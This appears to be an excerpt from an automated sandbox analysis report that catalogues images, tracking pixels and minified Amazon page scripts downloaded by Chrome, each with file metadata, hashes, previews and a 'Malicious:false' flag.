                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................1...!AQ"2Bar....#4RSTbq.3............$.D..................................................1Q..!..2aq...."35BDs..#ARS...br............?..DDDDDDDDDE....d..3.)"&h..O@....\rVEM$.6(..x..{yO........8......1-..0.+Mt.7.c G.5j1.v}....W..$..{..z..(S.....:.....Cv.)..q2......u.B:66G.....`?..O.]q..U~.O.\C._.....<....p3.....R.g*..K....i]1c......{)1.?.I..&.+..t...].+......W...u.>.U..f.....K.s..E{no.....X.d.@..`.%>H.J.s.....j..\C._.......W.............d..e.4{.\.>..Y........Ns..#..X.~8...y..=..iWU..Pm...Kd...'.k..X.......:.\+g.6s.._>.@..3..$..3....#c#...b. ./1.. w.....y.1..x....0........ .;.Ik3..C.u..k.9........y?.$./}....Z....&.\.%..ckXx...Zu.]......K7..+.6...&`V.....QB.i7o...#".Du.DE%B""""""""""""""""""*#....o./..uDo.Z......S..-<..Pw.....9I.C+'.;.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):700487
                                                                                                                                                                                                                                                                Entropy (8bit):5.5818702952501935
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:iu6Pm2t8CL5FFTU58dWWnlpHUabaWo/m9tfnt8Tc:iTPmEn5FFTU58dWWnXHzcWqc
                                                                                                                                                                                                                                                                MD5:88A47B6F40FD040897D5BF68ACB019D9
                                                                                                                                                                                                                                                                SHA1:F52130A5FF9C804570DB87CA7E481A61301BDAE5
                                                                                                                                                                                                                                                                SHA-256:AA225C51716DFF7272730BF59F25668E5E3E036E4F66688F10ADC75832CFAA35
                                                                                                                                                                                                                                                                SHA-512:D2D6993A808BCB38CBF7CE6501799CA03C5B40BD02CA0FEF02824C1D08E09CECB4E27BC116811266B10CD967AEF5E94AEA3C80D706CFC83BE082AD6C3FDBD6D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.com/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:PAGVV1BKBQP3X0S0NFTP$uedata=s:%2Fap%2Fuedata%3Fat%26v%3D0.295375.0%26id%3DPAGVV1BKBQP3X0S0NFTP%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D267%26pc%3D397%26at%3D397%26t%3D1723469074415%26pty%3DAuthenticationPortal%26spty%3DSignInClaimCollect%26pti%3Dundefined%26tid%3DPAGVV1BKBQP3X0S0NFTP%26aftb%3D1%26lob%3D0:398
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 150x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9879
                                                                                                                                                                                                                                                                Entropy (8bit):7.95124171487236
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:EBrR0jDTEd7AByuzdIkz5DuZTtxEJkTQXY1tavfo4zj3J:Er0jDTES4QdbDuJbEqyvfo4h
                                                                                                                                                                                                                                                                MD5:5356073E13A9B591D4A919647D218EE6
                                                                                                                                                                                                                                                                SHA1:CCF3089D50825B49E6BEA8D0CB349652931FFA81
                                                                                                                                                                                                                                                                SHA-256:AB55980D0A431C2140A99A88533B5398A74F031202A0FFDC5DDCB8EF411857BC
                                                                                                                                                                                                                                                                SHA-512:F19A78C7010D2ACD90F19F714A0B64ECCC6E3E0D5B7F091AB30819794AEC7B8112CF09CB5E26A37EAEA5833DFFA854ED5F9CAE215F883C8B10D3726ED46F4E46
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!..1A."Qa.2q#B...Rr......b....35Tt$s....................................................!1A.."Rq.#B.2Q....Sa.............?.....=...0`.......C...!..0`.0`....;.i...&8...uB...zK...Q?...p....Gx.Z].......(..W.<..o..U.......a...xjIr.i..[..;.>t.y.!.........&k....z.:T.fG2.4s...k6.....1....OG.n...W......M.0..x.*.Uu*|?F.O...~U,.R.V.k"..1h.#r..c.c..?.4.......VZ.U.T"!.h.B..&*.`....g..F...<A__..C<I...|....NDB..w+.........0.....).C....M.b.I..JH...ofSgS.7Eu!.HJ.k.O.9..5..S....n.q..H8..>...g......."V{,!K..q.pt.NV.Rj#..A$..!... ..)bD.I\%...?.Rg...,........^.[O...].0<R....`U...G...2.o....Y.y..|.j.w..........8.#L.\.+..3...He....Uv7.N..Qa..\k...c(.VT..q.......Qf;...4.V....s...Sj......q..0a...0`.0`......E'.W..5B...........@.....b..f.YY.w.4...p....Cm1..f..wJ..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 173x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6096
                                                                                                                                                                                                                                                                Entropy (8bit):7.920252042996531
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tpt9n8K5G0D6zfPOvxGiG7eMqfCzsXcmVEX5j6Pv3hsQ91zAUsUpuNN52d9XUpqy:H2K57DuPM7G7e/xpEX5j6X3hdFAUsU81
                                                                                                                                                                                                                                                                MD5:E5EB296D49B15AFDFA6763F59FB3C38B
                                                                                                                                                                                                                                                                SHA1:A4C0859E96E717F71101BF1FE4BF67C9C15BACF0
                                                                                                                                                                                                                                                                SHA-256:D13C030C1CAF9D7E0FFDC5838A558D3BC5CE225141F1E27FA58C3770E2C9CB0C
                                                                                                                                                                                                                                                                SHA-512:8A29CD6F78CAFA6828C923F2339CF089D65E9A53F3656A66A259F5FC0C93FA61B078BBB73370F78FE7905A983EBE89833C56D233F71D908549EB90410F6530FA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...................................................................!1A"6Qart...2BR......45Uqs.....#3STc....CV...$b..................................................Q..1....2Sa...".............?..t.(..(..(..(..(...o...^..#....s..Pd.....$.@<s...Ot./.7M...a.yF.@w..X..x.NU.q.U..`...]...TW...SSO.....Xi1.1Gl.......K...9.....l.......M......e.w11#...........gd.$1.eH...B..u......+....=.....Q.hF......IWV\.T....../...-_..M....(<W .......~.W..?..k..)..p.........m......}. ~./.....LL....T..m.......3.........zw...k...?....+...Q..[....f..g...e-........._g.9...7W.S...W....c...c)....2.u.._....$....."m{Q...0(.".n.u..AX..Ux...N.H..[NH.PO...@.....eP.B.Z.`....>X8.K...K[(....~ ..GO.@.e+..>.....$...F...H..($.R..R..R..R..R.......3..z...3...&:..........^v..4.&...I..*"ol*........U.#..q....._.?......S.F..u...pR`.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):10397
                                                                                                                                                                                                                                                                Entropy (8bit):7.961714219239287
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Q+yfsuMtxhn9LMcdfc8HQ11/U9ZVa+vmVHMGdkHPXkfR41Zq0ao4Cxrdg:Ly6BLNlHQ1CVzOVHMwkH/oR4vao4iZg
                                                                                                                                                                                                                                                                MD5:290B86041DF1FC97B0EB9A355FBBBECA
                                                                                                                                                                                                                                                                SHA1:FE6313B2747641135FD4DA2F41D5804F1E3A719A
                                                                                                                                                                                                                                                                SHA-256:F84F638297332C5FE37432C45596D3A79005A23247CEC899D2B5662AE7E7D599
                                                                                                                                                                                                                                                                SHA-512:C6E418FFC1C85EF68838492CD76B5EC209E25991F25F71D1DF95F949DDD965A715DC217DCBBB54DFEF8BC933E886FF756A38DAB2446171747BB5FB74EA7867F2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71KMAIXQSwL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.."AQq....2BRa....S.....#3T$%Crs....4c.....5Du......................................................!1AQR.2...."q.#4a...B............?..Q-.`....NV.>...B...q.;.?............M.......sG.....,}(..L..M..........H..&h...4.R....I.....Fv..P...QL.I.)....QM.z.f.@.w..}.'q...J...-..X....|na.W....(...nS J~...Q.s.R..\T{u4.J.b....+xv.u.*..O.n>..B../?.R...4.*gu...*D....E..(..})ZM:Q.+SsN.R.P13D4.(.R..)")..B...E.<+I2.1.(.S..B.......m.!.....P.t1Jb.(...M5.S...E....Oq.Z..f...z.......+..yn.v.x%X...&....'...Ef......Ru..Ha....c.69_.zq.F.I........{VZ..)5...M^F..Go..........8......Y.Z...:.~B.:...7.s..l.Kg.y^.\.Ronb.....(..O.....=+F.(..$l...1......p.L.5....5.Ub.V.r.4..E?lG..}. .t..=-.....|..D...H..Y..@.....\$J0...f.{.......H..K....G...o...\.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):12816
                                                                                                                                                                                                                                                                Entropy (8bit):7.864378439682934
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:FszKPFNrgqoX8+u6A6WvKmQD5ToYSE9cKLqNwoPqxmBiTS2qvPQ0MQZ:FsOKC6APvKmQNJSE9cinoqUBiS5vb
                                                                                                                                                                                                                                                                MD5:F536EE4E0872DAFBE715879ED8C9FB1E
                                                                                                                                                                                                                                                                SHA1:2F8023FCD670DED11C16D9CCD1E0FB518D0B4528
                                                                                                                                                                                                                                                                SHA-256:A63E7ECA669FFEF28AD7C0C0A2D1297ECC5D1B78E63A420812BD570097FDB7F8
                                                                                                                                                                                                                                                                SHA-512:D6FCB7B031E5A15AF946F5F1610FB59C7B9F8DFFAEFC95E5A0DF90FC735C335A5B9EB49D93713B47B5A3B66B73699CBC4254A02A9C7ECFBEF9E7F11E8934BEA3
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5....................................................................................................-..`\a.nKW...Y....................oY.....nY.%..o...Y.w............./...^.7.\r........zzT...._.'..}.......c...............6.5..J...+c.}.O......a\d....sN?......<=..+...................F.Y.W.E..n.........$.....w..J..d..Q..Z..z........}...................hn.`sXc&=.9H..8.6.m...../.&..7e...f.q.C...e.7.f....>?K..+f.;f:.................De.NZ..1-.. .....mx.......T.\e.Oir...q&V....6..?e/.k+...0."D...m.O.#...........EZ!...,..4....C&.jX.y......6+.......{{v......V)....].......q....................9.:k...c9{.R43.44......{...<7............z...\0|EDv...9..&..O..w...U[W(.......R.......h.*e......[(:x@...........O.J....UG'..o....<k....c..g........\..t....-I.i..q.p...Q.v...............-.AIVI.k...xqC.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26ctb%3D1%26sc0%3DjQueryWindowLoad%26cf0%3D41685%26pc0%3D41685%26ld0%3D41685%26t0%3D1723469044683%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41684
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4973
                                                                                                                                                                                                                                                                Entropy (8bit):7.901948427311911
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T2yzgNnWCqvMbYHtRr2d2rV2rbLiu4lMbHz49WU+hvFe9MbT5Ryn7aXSg:jgxWxMbYN62rVYbLoKnvfRy7ng
                                                                                                                                                                                                                                                                MD5:A7568FF3775ED9015843698E92693CA8
                                                                                                                                                                                                                                                                SHA1:0AE8A283C16B412956BD17C65545B905F885E0F2
                                                                                                                                                                                                                                                                SHA-256:18E71D69BA1960BB935654409A8BA547E1B106E70353AF8DE6525D33672FFA56
                                                                                                                                                                                                                                                                SHA-512:37152BFF0EA99963ED9C8618D2135B45F7355DD4E93D269BAA2E5020116C64B2F74CD7B9DA65BC46CF5E72C1B2609012330C8C964EC9AEED655DFA3278FB84A8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/ohl/xmsridha/toys_bau_qc_2322/xcm_banners_toys-bau-qc-2322-372x232-b08fxs6285_372x232_ae-en._SY116_CB627396615_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!.1.Aq"2Qa..#B...br....$3....4RS...................................................!.1.A."2Qaq...34C..Br.............?...)].)JQ....)Y"..eD.X.e...&*..".WB .[.T......."..z.6.Z....R...{.%AR..W.5=]..+DK.1....T...`....6.k,.J6.N....N.e..&.'..s.\Z...4.sJ!F..(..z...".I..<).{..n....x..z......y.V...[.<.........Me.P.c.JTc....}j...<..>..>.....8....e..k.][g.:0......J:.M?.....{....K.vu?.(.v`.;.8......~..../......+.3,......*r;.y...d..F.......8....JR...)JQ....)JQ......#....g.`D`......9..U*._...j..v..x..K..y.2.....nB.Z...E......M.t.y^\?u.,....Z.z...iUU..Y..f....H.....B...u....h..[...YN1..@`.;......b7W..'..bi.xn!.L..f...p.ty(.\...{?1..K;...{y.V.QIXIZ#../.S>...&.-....gn..Q...B.4..==b.L`\...G@............F8...`+...".s..p;....5..@.(.D.f.2.Y..&...n.J.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3097
                                                                                                                                                                                                                                                                Entropy (8bit):7.796732921016361
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:/85mpc2BJWJDMOX3U3Ju8DMvvH/njc2WRiMqZTSf57Pn35fpHsub9:/86c2mp9HU3OvHjcxRaNSfRJfVJ
                                                                                                                                                                                                                                                                MD5:D6CDF967FF56E4FC4101417898604FB3
                                                                                                                                                                                                                                                                SHA1:3C5502DAB48481B09937CB2FC2911D98375B9ACD
                                                                                                                                                                                                                                                                SHA-256:AAA083549A0B0892E4E3521D3480FD10CAE51F41B7B995B7D36C78C799D97A0E
                                                                                                                                                                                                                                                                SHA-512:0C0D5CC3815D8FF7BF93B4BF2BE42C8E5E3B0A2B0FEB1D73B909189382989C7F0EE762285AB232A29362CE34A07F299FAA5E46D6F6AB4B2852BC48404E888FAF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5.......................................................................|.D..~..........#1...:.L...X.7v3E............|*.3#].........UlV.#rs...v.............zF.,w.".....lno.....Vr...l:/...N.a........~...O..zS9....:.........).J.~d...(........G...+......'..s.k._[...^..^..n.Y.5&.....>...n.Z..y...o...Ob....y{..Nt4..0..............@............................!1AQ."02aq..@RrBb.......$6CDsu............?......?%..gn....Y..l...k.>\.S/.!.......B...#..x..0=.....R.d8..Gt....A.....~..p..-...Z....O.~.8.,..P.SJ..W...iWP..g.p~I.,..#.....2.l..>>.rj."I.D..].*`.*q .E$.......>S.E..,...d..N.U.....%0R..]R.....W.A....r$..H.Y)...~...[...2.......V....9......r.W%y..U:.`..,....N.Tn...o....x.9h..70..qQ-.K].4.S..Tv8..C....X5.y......+...((+....;..G.k...H"......5...4..#.P...........m.i..w.....&..no....p.%@
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (506)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1897
                                                                                                                                                                                                                                                                Entropy (8bit):5.295537930728398
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:DxGQO2Vkgw6yp34Ih/Z/UD6B9zexGqpUDIRtVKn0FP0I2:DxG52VkgwtA6TeoIRDE0SI2
                                                                                                                                                                                                                                                                MD5:84FC07603C6B7D7C8A4DEA1951AA3F51
                                                                                                                                                                                                                                                                SHA1:81D1C249A0A70129C96F8111ABCFCB3E62F2F4ED
                                                                                                                                                                                                                                                                SHA-256:1E90436DD878AC44E6868965D8DD7FFA194CBA607D31B83FF21CB31D48A70DF0
                                                                                                                                                                                                                                                                SHA-512:1139A5C5A64AB3FB74832ECA3087D0A9E9C9277473A9FAC6156D03C43AB058F81C55F3C828273604E0F48C4290ED6AA538D8D53127CAE7F29D574E2AED34D422
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(c){var b=window.AmazonUIPageJS||window.P,f=b._namespace||b.attributeErrors,e=f?f("PerformanceResourceTimingAssets",""):b;e.guardFatal?e.guardFatal(c)(e,window):e.execute(function(){c(e,window)})})(function(c,b,f){"use strict";c.when("performance-resource-timing-utils").register("performance-resource-timing",function(e){function c(a){for(var h={},b=0;b<a.length;++b){var d=a[b],g=e.determineType(d.name),c=d.duration,m=d.responseEnd,k=d.transferSize||0;d=k/1024;k=0===k&&100>c;var l=h[g]||(h[g]=.{});g=function(a,b){l[a]=(l[a]||0)+(b!==f?b:1)};var n=function(a,b){l[a]=Math.max(l[a]||0,b)};g("requests");g("requests"+(k?"-cached":"-uncached"));g("total-duration",c);n("max-duration",c);g("total-transferred",d);n("max-transferred",d);n("long-pull",m)}p(h);return h}function p(a){for(var b in a)if(a.hasOwnProperty(b)){var c=a[b],d=100*(c["requests-cached"]||0)/c.requests;c["cache-hit-rate"]=d;c["cache-hit-rate-bucket"]=10*Math.ceil(d/10)}}function m(a,c){c=c!==f?c:1;b.ue&&b.ue.count&&b.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):58
                                                                                                                                                                                                                                                                Entropy (8bit):4.364819634194334
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:j4OiLEF1vjdKDMJldsM9fkLHn:j4DErdKDMbdsN
                                                                                                                                                                                                                                                                MD5:B1935F865A4EADE8564B6EF4B022F27F
                                                                                                                                                                                                                                                                SHA1:F42746792E52473C4D9E152ACEB7080550D3C1E5
                                                                                                                                                                                                                                                                SHA-256:21C52B1622A4539BF82DBC7FD4A2638CDDE3B8151697EB5C4D3DBB426576FBAA
                                                                                                                                                                                                                                                                SHA-512:9693E0CAD83BF557BDADDE705241F580ED85DB0375AC381A21FC10E020FF96386E68514356C3B15FDCAF7BDCB8D74804D794E63D5BC9F58245DBB18B6C9A8062
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:Standard Amazon AWS CloudFront Profile Experiment Response
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D1293%26pc0%3D1810%26ld0%3D1810%26t0%3D1723469004808%26sc1%3Dportal-bb%26pc1%3D3%26ld1%3D3%26t1%3D1723469004315%26sc2%3DheroAf%26cf2%3D1391%26pc2%3D1391%26ld2%3D1391%26t2%3D1723469004389%26sc3%3Dh1Af%26cf3%3D1394%26pc3%3D1394%26ld3%3D1394%26t3%3D1723469004392%26sc4%3DnavCF%26cf4%3D1440%26pc4%3D1440%26ld4%3D1440%26t4%3D1723469004438%26sc5%3DcsmCELLSframework%26bb5%3D1601%26pc5%3D1601%26ld5%3D1602%26t5%3D1723469004600%26sc6%3DcsmCELLSpdm%26bb6%3D1602%26pc6%3D1775%26ld6%3D1775%26t6%3D1723469004773%26sc7%3DcsmCELLSvpm%26bb7%3D1775%26pc7%3D1776%26ld7%3D1776%26t7%3D1723469004774%26sc8%3DcsmCELLSfem%26bb8%3D1776%26pc8%3D1777%26ld8%3D1777%26t8%3D1723469004775%26sc9%3Due_sushi_v1%26bb9%3D1779%26pc9%3D1780%26ld9%3D1780%26t9%3D1723469004778%26sc10%3Ddesktop-grid-1-visible%26cf10%3D2958%26pc10%3D2958%26ld10%3D2958%26t10%3D1723469005956%26sc11%3Dgw-ftGr-desktop-hero-1-visible%26cf11%3D3071%26pc11%3D3071%26ld11%3D3071%26t11%3D1723469006069%26sc12%3Ddesktop-grid-2-visible%26cf12%3D3382%26pc12%3D3382%26ld12%3D3382%26t12%3D1723469006380%26sc13%3Dadplacements%3AsfImpression%3A3221523e-c639-400a-a04d-789177f02209%26bb13%3D3601%26pc13%3D25747%26ld13%3D25720%26t13%3DMon%20Aug%2012%202024%2009%3A23%3A48%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc14%3Dadplacements%3AsfImpression%3AGateway%3Adesktop-ad-center-1%3Adesktop%26bb14%3D3601%26pc14%3D25747%26ld14%3D25720%26t14%3DMon%20Aug%2012%202024%2009%3A23%3A48%20GMT-0400%20(Eastern%20Daylight%20Time)%26sc15%3Ddesktop-grid-3-visible%26cf15%3D4105%26pc15%3D4105%26ld15%3D4105%26t15%3D1723469007103%26sc16%3Ddesktop-grid-4-visible%26cf16%3D4863%26pc16%3D4863%26ld16%3D4863%26t16%3D1723469007861%26sc17%3Ddesktop-grid-5-visible%26cf17%3D6360%26pc17%3D6360%26ld17%3D6360%26t17%3D1723469009358%26sc18%3Ddesktop-grid-6-visible%26cf18%3D7183%26pc18%3D7183%26ld18%3D7183%26t18%3D1723469010181%26sc19%3Ddesktop-grid-7-visible%26cf19%3D7844%26pc19%3D7844%26ld19%3D7844%26t19%3D1723469010842%26sc20%3Ddesktop-grid-8-visible%26cf20%3D8716%26pc20%3D8716%26ld20%3D8716%26t20%3D1723469011714%26sc21%3DspLoadJs%26cf21%3D8717%26pc21%3D8717%26ld21%3D8717%26t21%3D1723469011715%26sc22%3Ddesktop-1-visible%26cf22%3D11123%26pc22%3D11123%26ld22%3D11123%26t22%3D1723469014121%26sc23%3Ddesktop-btf-grid-1-visible%26cf23%3D18335%26pc23%3D18335%26ld23%3D18335%26t23%3D1723469021333%26sc24%3Ddesktop-btf-grid-2-visible%26cf24%3D18375%26pc24%3D18375%26ld24%3D18375%26t24%3D1723469021373%26sc25%3Ddesktop-btf-grid-3-visible%26cf25%3D18908%26pc25%3D18908%26ld25%3D18908%26t25%3D1723469021906%26sc26%3Ddesktop-btf-grid-4-visible%26cf26%3D19474%26pc26%3D19474%26ld26%3D19474%26t26%3D1723469022472%26sc27%3Ddesktop-btf-grid-5-visible%26cf27%3D20224%26pc27%3D20224%26ld27%3D20224%26t27%3D1723469023222%26sc28%3Ddesktop-btf-grid-6-visible%26cf28%3D20323%26pc28%3D20323%26ld28%3D20323%26t28%3D1723469023321%26sc29%3Ddesktop-3-visible%26cf29%3D20476%26pc29%3D20476%26ld29%3D20476%26t29%3D1723469023474%26sc30%3Ddesktop-btf-grid-7-visible%26cf30%3D21005%26pc30%3D21005%26ld30%3D21005%26t30%3D1723469024003%26sc31%3Ddesktop-btf-grid-8-visible%26cf31%3D21777%26pc31%3D21777%26ld31%3D21777%26t31%3D1723469024775%26sc32%3Ddesktop-4-visible%26cf32%3D22406%26pc32%3D22406%26ld32%3D22406%26t32%3D1723469025404%26s